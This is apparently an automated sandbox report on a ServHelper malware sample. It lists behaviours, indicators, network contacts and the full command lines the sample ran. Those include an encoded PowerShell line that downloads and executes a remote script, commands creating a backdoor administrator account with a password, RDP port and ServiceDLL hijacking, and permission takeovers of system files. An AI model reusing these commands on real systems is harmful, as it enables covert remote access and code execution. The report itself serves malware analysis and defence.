Analysis Overview
SHA256
02031c62d916cdd41d26a271e93ec5b06eabfa910187207b02ead07fd480c2a9
Threat Level: Known bad
The file 1aa9dda1b9b413444b0668500611c7f3 was found to be: Known bad.
Malicious Activity Summary
ServHelper
Grants admin privileges
Modifies RDP port number used by Windows
Possible privilege escalation attempt
Executes dropped EXE
Sets DLL path for service in the registry
UPX packed file
Blocklisted process makes network request
Modifies file permissions
Deletes itself
Loads dropped DLL
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Modifies registry key
Script User-Agent
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-24 05:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-24 05:19
Reported
2021-08-24 05:22
Platform
win7v20210408
Max time kernel
158s
Max time network
183s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 852 set thread context of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0c81e453-baaf-40e2-8303-3d13945417e0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1d87d01-7ccf-4430-b6f9-db5552bca0cb | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66281f60-6b3d-4e9b-8b33-d76b3afd1685 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96b3d76b-a3e2-410d-90a8-a841514e0f57 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2C5NK5FADZY1QWTOXIU.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d618927-2737-4eb8-881e-d9e0ec9a5c0a | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b2cfaaa-4991-4916-a804-635c7fee2217 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99d6eabf-b0e5-4827-bdea-16e34dc5b20d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5d2c819d-2abf-48b9-bfdc-70d318a86891 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f206d1d3-6fbf-487b-8434-5e7eef66354a | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_186b0f4f-fc0e-41d1-9f06-63a5ab208c36 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b888dce8-5e03-4e0b-9b2b-9fa2e4205658 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10eadd35b998d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe
"C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
Uso.exe.com B
C:\Windows\SysWOW64\PING.EXE
ping QWOCTUPM -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dfxeqvt1\dfxeqvt1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8797.tmp" "c:\Users\Admin\AppData\Local\Temp\dfxeqvt1\CSC63C13FED99E4412E87E4A9C7B7A5D23.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wajxlNxR /add
C:\Windows\system32\net.exe
net.exe user wgautilacc wajxlNxR /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wajxlNxR /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wajxlNxR
C:\Windows\system32\net.exe
net.exe user wgautilacc wajxlNxR
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wajxlNxR
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | SMlwtcVckecAT.SMlwtcVckecAT | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | asfuuvhv3083f.xyz | udp |
Files
memory/1468-60-0x0000000075041000-0x0000000075043000-memory.dmp
memory/1672-61-0x0000000000000000-mapping.dmp
memory/1152-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Bianchezza.xltx
| MD5 | 7d4057365f857501253e0273336b7256 |
| SHA1 | 62375a5303e4a59e95cf7e0072cd58efa187b7f2 |
| SHA256 | 003e6c8d0f15c6eb4738ea99f9fd99457d43d65e9d4f15506446db4b51b02079 |
| SHA512 | 7059a22ba6020db18f7b86e09b816bedd0a9f208818dcb98c69a647f6aee18ffaf4c60c3725bdfa8a354a7244b9c32fc07c3fc0d807ca39dda69842681a9fd6c |
memory/2040-64-0x0000000000000000-mapping.dmp
memory/1208-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Veda.xltx
| MD5 | e7173515ef44feb1ee618484b7743e93 |
| SHA1 | 8f976bf1da030655afd0f43e0a357a58a2ea9178 |
| SHA256 | 7875f52e1f97a463783456b6b3c2dbc85f183534b5281ba72b0574529139d86b |
| SHA512 | 41830f7036e32679bf274c67390dd6bca9f6286ee8d3144d0e57ca39fdca1ec1a8273fb528ffed819444b183067ab6078bfaa0e82d16deed3fac47a1cf027361 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Quegli.xltx
| MD5 | 88f64f83b0347a89de94d39c922de8be |
| SHA1 | 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4 |
| SHA256 | 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5 |
| SHA512 | 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/1212-69-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/1340-72-0x0000000000000000-mapping.dmp
memory/1212-71-0x000007FEFB561000-0x000007FEFB563000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\B
| MD5 | 88f64f83b0347a89de94d39c922de8be |
| SHA1 | 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4 |
| SHA256 | 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5 |
| SHA512 | 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/852-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
